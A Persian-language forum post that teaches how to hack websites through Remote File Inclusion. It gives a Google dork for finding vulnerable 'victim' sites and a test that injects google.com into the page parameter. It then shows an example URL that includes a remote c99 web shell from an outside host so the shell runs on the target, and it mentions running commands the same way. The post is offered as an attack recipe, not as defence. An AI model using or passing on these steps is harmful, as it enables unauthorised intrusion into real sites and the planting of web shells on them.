amir_HK

آموزش هک سایت با باگ RFI

1 ارسال در این موضوع قرار دارد

          به نام خدا

 

با سلام خدمت تمامی دوستان

 در این تاپیک می خوام باگ RFI به صورت کامل و دقیق آموزش بدم

آموزش در 3 مرحله صورت می گیره

 اسپم ممنوع

 سوال+نظر+پیشنهاد در پ.خ 

 

در مورد باگ RFI :

باگ RFI مخفف Remote File Inclusion است و مثل سایر باگ ها در برنامه نویسی غلط به وجود میاد.

باگ RFI در بی دقتی در نوشتن توابع به وجود میاد.

مانند تابع Include و Require

با استفاده از این باگ کارهای زیادی میتوان انجام داد از جمله : تبدیل آن به اجرای دستورات از راه دور با استفاده از گزارش های Apache ، خواندن فایل های مهم سیستمی با فایل های config Rfi.

 
مرحله اول:شناسایی و پیدا کردن باگ RFI
 
خب در این مرحله همونطور که می دونید باید سایتی رو که باگ RFI داره پیدا کنیم.

دقت داشته باشید که برای تست این باگ،سایت باید Navigation (جهت یابی) همانند زیر را داشته باشد:

1.

www.target.com/index.php?page=Anything

خب رایج ترین دورک باگ RFI این هست:

"inurl=index.php?page=" 

و به این ترتیب تمامی سایت هایی که عبارت بالا را در آخر خود دارد بارگذاری می شوند.
همچنین لیستی از بهترین دورک های این باگ برای سهولت کار شما عزیزان پیوست میشود.

رمز: guardiran.org

  

مرحله دوم:تست باگ RFI روی سایت

 

 

در این مرحله یاد میگیرید که باگ RFI رو روی سایت تست کنید و مطمئن بشید که سایت باگ داره.

این کار هم بسیار راحت هست.شما باید در این عبارت:     

www.target.com/index.php?page=news

هرچه جلوی علامت مساوی هست رو پاک کنید و بنویسید www.google.com

خب اگر سایت گوگل در وسط وب سایت قربانی به نمایش درآمد یعنی اینکه وب سایت قربانی به این حمله آسیب پذیر است ولی اگر سایت گوگل بالا نیامد شما باید هدف دیگری رو جست و جو کنید.

این هم از مرحله دوم  cool.png 

 

مرحله سوم:Hack سایت با باگ RFI

 

 

در دو مرحله بالا یاد گرفتید که چطور یک سایت آسیب پذیر به این باگ پیدا کنید و اون رو تست کنید

باید بگم این مرحله از دو مرحله قبل هم آسون تره  13.gif 

ما در مرحله دوم گفتیم که برای تست سایت،هرچه جلوی علامت مساوی هست پاک کنید و  بنویسید www.google.com

خب وقتی که مطمئن شدید سایت باگ داره، به جای www.google.com لینک مستقیم شل خودتون رو قرار بدید.

خواهید دید که شل شما به روی وب سایت قربانی اجرا می شود  rolleyes.gif 

مثال:

www.target.com/index.php?page=http://h1.ripway.com/mydomin/c99.txt?
 

excl.png  نکته 1: حتما علامت ؟ را در اخر ادرس شل قرار بدید وگرنه شل اجرا نمی شود 

excl.png  نکته 2: دقت داشته باشید که فرمت شل فقط باید txt باشد

 

همچنین شما می تونید با دستور command دستورات خود رو به روی سایت اجرا کنید.

مثال:

www.target.com/index.php?page=command

     

 

 لطفا از این پست تشکر کنید

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
مهمان
این موضوع برای عدم ارسال قفل گردیده است.